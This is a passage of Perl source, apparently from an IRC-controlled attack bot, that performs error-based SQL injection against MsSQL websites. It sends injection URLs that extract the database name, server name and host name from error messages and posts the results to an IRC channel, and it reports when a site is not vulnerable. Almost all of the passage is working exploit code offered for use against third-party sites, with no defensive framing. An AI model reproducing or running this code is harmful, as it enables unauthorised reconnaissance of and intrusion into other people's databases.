  511. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL System_User Is : 6$system_user\r\n";
  512.  
  513. my $injection = $site.$db_name ; # Repeated for db_name()
  514. my $request = HTTP::Request->new(GET=>$injection);
  515. my $useragent = LWP::UserAgent->new();
  516. $useragent->timeout(10);
  517. my $response = $useragent->request($request)->as_string ;
  518. $db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  519. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL Database Name Is : 6$db_name\r\n";
  520.  
  521. my $injection = $site.$servername ; # Repeated for @@servername
  522. my $request = HTTP::Request->new(GET=>$injection);
  523. my $useragent = LWP::UserAgent->new();
  524. $useragent->timeout(10);
  525. my $response = $useragent->request($request)->as_string ;
  526. $servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  527. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL Server Name Is : 6$servername\r\n";
  528.  
  529. my $injection = $site.$hostname; # Repeated for Host_Name()
  530. my $request = HTTP::Request->new(GET=>$injection);
  531. my $useragent = LWP::UserAgent->new();
  532. $useragent->timeout(10);
  533. my $response = $useragent->request($request)->as_string ;
  534. $hostnames = $1 if ($response =~ /.*value\s'(.*)'\sto.*/); # Result goes to the package global $hostnames, not to $hostname
  535. print $connection "PRIVMSG $channel :4$asker 12[!] MsSQL HostName Is : 6$hostnames\r\n";
  536. }
  537. else
  538. {
  539. print $connection "PRIVMSG $channel :4$asker 10[!] This Website Is Not SQL Vulnerable !\r\n";
  540. }
  541. }
  542. ############################################################################################